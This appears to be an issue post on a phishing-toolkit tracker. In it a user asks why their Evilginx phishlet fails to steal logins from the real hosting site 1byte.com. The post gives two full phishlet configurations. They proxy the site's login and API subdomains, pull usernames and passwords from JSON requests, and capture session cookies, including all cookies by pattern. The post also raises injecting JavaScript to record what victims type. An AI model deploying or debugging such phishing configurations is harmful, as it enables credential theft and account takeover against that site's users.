Evilginx ver 3.3.0 cannot capture credentials

[alasalamont]

DO NOT ASK FOR PHISHLETS.

DO NOT ASK FOR HELP CREATING PHISHLETS.

DO NOT ASK TO FIX PHISHLETS.

DO NOT ADVERTISE OR TRY TO SELL PHISHLETS.

EXPECT A BAN OTHERWISE. THANK YOU!

REPORT ONLY BUGS OR FEATURE SUGGESTIONS.

Hi all,
I am using Evilginx 3.3.0 and testing for this domain 1byte.com. But cannot catch the credentials

• Here is the POST request. The site use json format therefore the type at credentials must be json
  

• Here is the cookies stored on browser. The needed-cookies are auth._token_expiration.local and auth._token.local
  

• I did try test regular expression for catching the value of username + password. It works
  

• And here is my 1st phishlet, did not work :(

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['auth.token_expiration.local:always', 'auth._token.local:always']
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

• For the second phishlet, I specified all the domains correctly, but I encountered an issue with setting the value of auth_urls. The landing page is 1byte.com, but after logging in, the user dashboard uses bo.1byte.com and the content is retrieved from api.1byte.com. Since I set 1byte.com as the landing page in the proxy host, there's no way to instruct Evilginx to check api.1byte.com using the auth_urls after the login.

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: '', orig_sub: '', domain: '1byte.com', session: true, is_landing: true, auto_filter: true}
  - {phish_sub: 'bo', orig_sub: 'bo', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
  - {phish_sub: 'api', orig_sub: 'api', domain: '1byte.com', session: true, is_landing: false, auto_filter: true}
sub_filters:
  #- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
auth_tokens:
  - domain: '.1byte.com'
    keys: ['.*:regexp']
  - domain: '1byte.com'
    keys: ['.*:regexp']  
  - domain: '.api.1byte.com'
    keys: ['.*:regexp']
  - domain: 'api.1byte.com'
    keys: ['.*:regexp']
auth_urls:
  - '/'
credentials:
  username:
    key: ''
    search: '"username":"([^"]*)"'
    type: 'json'
  password:
    key: ''
    search: '"password":"([^"]*)"'
    type: 'json'
login:
  domain: '1byte.com'
  path: '/'

Another option is to inject JavaScript to capture what the user inputs, but that's not what I'm aiming for. I just want to know if the way I've built the phishlet is correct or not. If it's wrong, where exactly is the issue? Or are there certain cases where Evilginx can't capture credentials without injecting JavaScript?

Thanks!!!